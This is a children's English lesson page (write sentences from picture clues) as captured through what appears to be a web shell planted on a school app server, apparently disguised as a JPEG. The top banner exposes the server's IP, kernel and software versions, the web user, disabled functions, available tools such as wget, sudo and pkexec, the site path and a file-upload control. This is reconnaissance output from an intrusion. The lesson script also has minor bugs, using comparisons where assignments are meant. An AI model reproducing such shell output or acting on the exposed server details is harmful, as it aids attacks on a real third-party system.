????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.191 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelD/Category1/ |
Upload File : |
<!doctype html>
<html>
<head>
<title>Answer questions using picture clues</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<script>
var correctAnswers = 0;
function page_preLoad()
{
shared_setDeviceTypeLevelCategoryLastLesson(Level.D, Category.No1);
shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.D, Category.No1, 33), true, true);
shared_setFooterTable('id_tblFooter', true, true, true, true, true);
var ids_headings = ['id_td_heading1'];
var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10'];
shared_adjust_fontSize_for_ids_all_devices(ids_headings, 80);
shared_adjust_fontSize_for_ids_all_devices(ids_texts, 80);
shared_set_border_none_for_td_bottom_except_android(['id_td_heading1']);
var eInputText1 = document.getElementById('id_td_text3');
var eInputText2 = document.getElementById('id_td_text6');
var eInputText3 = document.getElementById('id_td_text8');
var eInputText4 = document.getElementById('id_td_text10');
eInputText1.isCorrect == false;
eInputText2.isCorrect == false;
eInputText3.isCorrect == false;
eInputText4.isCorrect == false;
}
function page_onLoad()
{
}
function btnHome_click()
{
shared_btnHomeCategories_click('LevelD');
}
function btnPrevious_click()
{
window.location = "LevelDCat1Lesson32.html";
}
function btnNext_click()
{
window.location = "LevelDCat1Lesson34.html";
}
function btnValidate_click()
{
var eInputText1 = document.getElementById('id_td_text3');
var eInputText2 = document.getElementById('id_td_text6');
var eInputText3 = document.getElementById('id_td_text8');
var eInputText4 = document.getElementById('id_td_text10');
if ((eInputText1.isCorrect == true) && (eInputText2.isCorrect == true) && (eInputText3.isCorrect == true) && (eInputText4.isCorrect == true))
{
shared_show_claps_animation('shared_id_div_claps_image');
}
}
function validateSentence(id_inputAnswer, correctText)
{
var eInputText = document.getElementById(id_inputAnswer);
var inputText = eInputText.value;
var enteredTextArray = inputText.split(" ");
var trimmedText = '';
for (var textIndex = 0; textIndex < enteredTextArray.length; textIndex++)
{
if (enteredTextArray[textIndex].trim() != '')
{
trimmedText += enteredTextArray[textIndex].trim() + ' ';
}
}
trimmedText = trimmedText.trim().toUpperCase();
eInputText.isCorrect = (trimmedText == correctText) ? true : false;
}
</script>
</head>
<body onload="page_onLoad()">
<div id="shared_id_div_claps_image">
</div>
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
<tr height="8%">
<td>
<div id="id_tblHeader"></div>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
<tr>
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="7%">
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
<tr>
<td id="id_td_heading1" class="shared_style_blue_24px_bold_padding_left_2_percent"><u>Read and write the following sentences with picture clues:</u>
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="100%">
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
<tr height="100%">
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="15%">
<td width = "100%">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width = "10%"> </td>
<td id="id_td_text1" width = "35%" class="shared_style_blue_24px_padding_left_2_percent">We can play with</td>
<td width = "10%">
<img id="id_imgBall" width="80%" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/ball.png" alt="" draggable="false"/>
</td>
<td id="id_td_text2" width = "20%" class="shared_style_blue_24px_padding_left_2_percent">and the</td>
<td width = "*">
<img id="id_imgDoll" width="30%" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/doll.png" alt="" draggable="false"/>
</td>
</tr>
</table>
</td>
</tr>
<tr height="10%">
<td width = "100%">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width = "10%"> </td>
<td width = "*" class="style_text">
<input id="id_td_text3" type="text" class="shared_style_options_red" style="text-align:left; width: 95%" onchange="validateSentence('id_td_text3', 'WE CAN PLAY WITH BALL AND THE DOLL.')">
</td>
</tr>
</table>
</td>
</tr>
<tr height="15%">
<td width = "100%">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width = "10%"> </td>
<td id="id_td_text4" width = "10%" class="shared_style_blue_24px_padding_left_2_percent">The</td>
<td width = "15%">
<img id="id_imgBull" width="90%" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/bull.png" alt="" draggable="false"/>
</td>
<td id="id_td_text5" width = "20%" class="shared_style_blue_24px_padding_left_2_percent">ran to the</td>
<td width = "*">
<img id="id_imgGoll" width="35%" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/grass.png" alt="" draggable="false"/>
</td>
</tr>
</table>
</td>
</tr>
<tr height="10%">
<td width = "100%">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width = "10%"> </td>
<td width = "*" class="style_text">
<input id="id_td_text6" type="text" class="shared_style_options_red" style="text-align:left; width: 95%" onchange="validateSentence('id_td_text6', 'THE BULL RAN TO THE GRASS.')">
</td>
</tr>
</table>
</td>
</tr>
<tr height="15%">
<td width = "100%">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width = "10%"> </td>
<td id="id_td_text7" width = "20%" class="shared_style_blue_24px_padding_left_2_percent">It is a</td>
<td width = "*">
<img id="id_imgBrassBell" width="25%" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/brassBell.png" alt="" draggable="false"/>
</td>
</tr>
</table>
</td>
</tr>
<tr height="10%">
<td width = "100%">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width = "10%"> </td>
<td width = "*" class="style_text">
<input id="id_td_text8" type="text" class="shared_style_options_red" style="text-align:left; width: 95%" onchange="validateSentence('id_td_text8', 'IT IS A BRASS BELL.')">
</td>
</tr>
</table>
</td>
</tr>
<tr height="15%">
<td width = "100%">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width = "10%"> </td>
<td id="id_td_text9" width = "70%" class="shared_style_blue_24px_padding_left_2_percent">Do not <span style="color: red">tell all</span> that I <span style="color: red">fell</span> from a <span style="color: red">tall</span></td>
<td width = "*">
<img id="id_imgWall" width="80%" src="../../../img/LevelD/Category1/LevelDCat1Lesson33/wall.png" alt="" draggable="false"/>
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td width = "100%">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width = "10%"> </td>
<td width = "*" class="style_text">
<input id="id_td_text10" type="text" class="shared_style_options_red" style="text-align:left; width: 95%" onchange="validateSentence('id_td_text10', 'DO NOT TELL ALL THAT I FELL FROM A TALL WALL.')">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="8%">
<td>
<div id="id_tblFooter"></div>
</td>
</tr>
</table>
<script>
page_preLoad();
</script>
</body>
</html>